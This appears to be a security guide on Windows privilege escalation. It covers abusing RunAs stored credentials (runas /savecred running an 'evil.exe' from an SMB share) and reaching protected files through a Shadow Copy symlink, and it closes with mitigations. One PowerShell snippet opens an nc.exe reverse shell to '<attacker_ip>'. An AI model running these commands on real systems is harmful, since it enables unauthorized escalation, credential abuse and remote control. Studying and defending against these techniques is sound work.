EoP - Runas

Elevation of Privilege (EoP) Techniques: RunAs and Shadow Copies

Overview

Elevation of Privilege (EoP) techniques are commonly used by attackers to escalate permissions within a Windows environment. Two notable methods include exploiting the RunAs command for stored credentials and abusing Shadow Copies to access restricted files and elevate privileges.

---

1. EoP via RunAs Command

The RunAs command allows users to execute programs with the permissions of another user. Attackers can leverage stored credentials to gain elevated access.

Step 1: List Stored Credentials

Stored credentials can be retrieved using the cmdkey utility. These credentials, if improperly managed, can be exploited to elevate privileges.

Command to List Stored Credentials:

cmdkey /list

Example Output:

Currently stored credentials:
    Target: Domain:interactive=WORKGROUP\Administrator
    Type: Domain Password
    User: WORKGROUP\Administrator

Step 2: Execute Commands with Elevated Privileges

Once stored credentials are identified, use the runas command with the /savecred option to execute binaries or scripts with elevated privileges.

Examples:

• Run a Remote Binary via SMB Share:

  runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

• Open Command Prompt with Elevated Rights:

  runas /savecred /user:Administrator "cmd.exe /k whoami"

Step 3: Use Provided Credentials for Execution

Commands can be executed using specific credentials provided programmatically in PowerShell.

PowerShell Example:

$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
Start-Process "C:\users\public\nc.exe" -ArgumentList "<attacker_ip> 4444" -Credential $mycreds

This method is particularly useful for automating EoP through scripts.

---

2. EoP via Shadow Copies

Shadow Copies (Volume Shadow Copy Service) are backups of system files and volumes. They can be exploited to access files with elevated privileges, even if the files are locked or restricted.

Step 1: List Shadow Copies

To identify available Shadow Copies, use either vssadmin or diskshadow.

• Using vssadmin:

  vssadmin list shadows

• Using diskshadow:

  diskshadow
  DISKSHADOW> list shadows all

Step 2: Access Shadow Copies

Once Shadow Copies are identified, create a symbolic link (symlink) to access their contents.

Example: Create a Symlink

Assuming a Shadow Copy exists as ShadowCopy1, create a directory link:

mklink /d C:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\

This command creates a folder C:\shadowcopy that points to the Shadow Copy, allowing unrestricted access to its contents. Sensitive files, such as password databases or configuration files, can then be retrieved.

---

Risks and Mitigation

RunAs Command Exploitation

• Risk: Stored credentials can be exploited if they are not adequately protected.

• Mitigation:

  • Avoid using /savecred unless absolutely necessary.

  • Regularly clear stored credentials (cmdkey /delete).

  • Implement strong password policies and enforce multi-factor authentication (MFA).

Shadow Copy Abuse

• Risk: Allows unauthorized access to sensitive files.

• Mitigation:

  • Restrict local administrator access.

  • Regularly audit and disable unnecessary Shadow Copies.

  • Use encryption for sensitive files and system backups.

General Mitigation Strategies:

• Implement principle of least privilege.

• Enable logging and monitoring of credential access and Shadow Copy usage.

• Apply the latest patches and security updates to minimize vulnerabilities.

---

Conclusion

The exploitation of stored credentials and Shadow Copies presents significant risks for privilege escalation. By understanding these techniques and applying the outlined mitigations, organizations can strengthen their defenses against EoP attacks.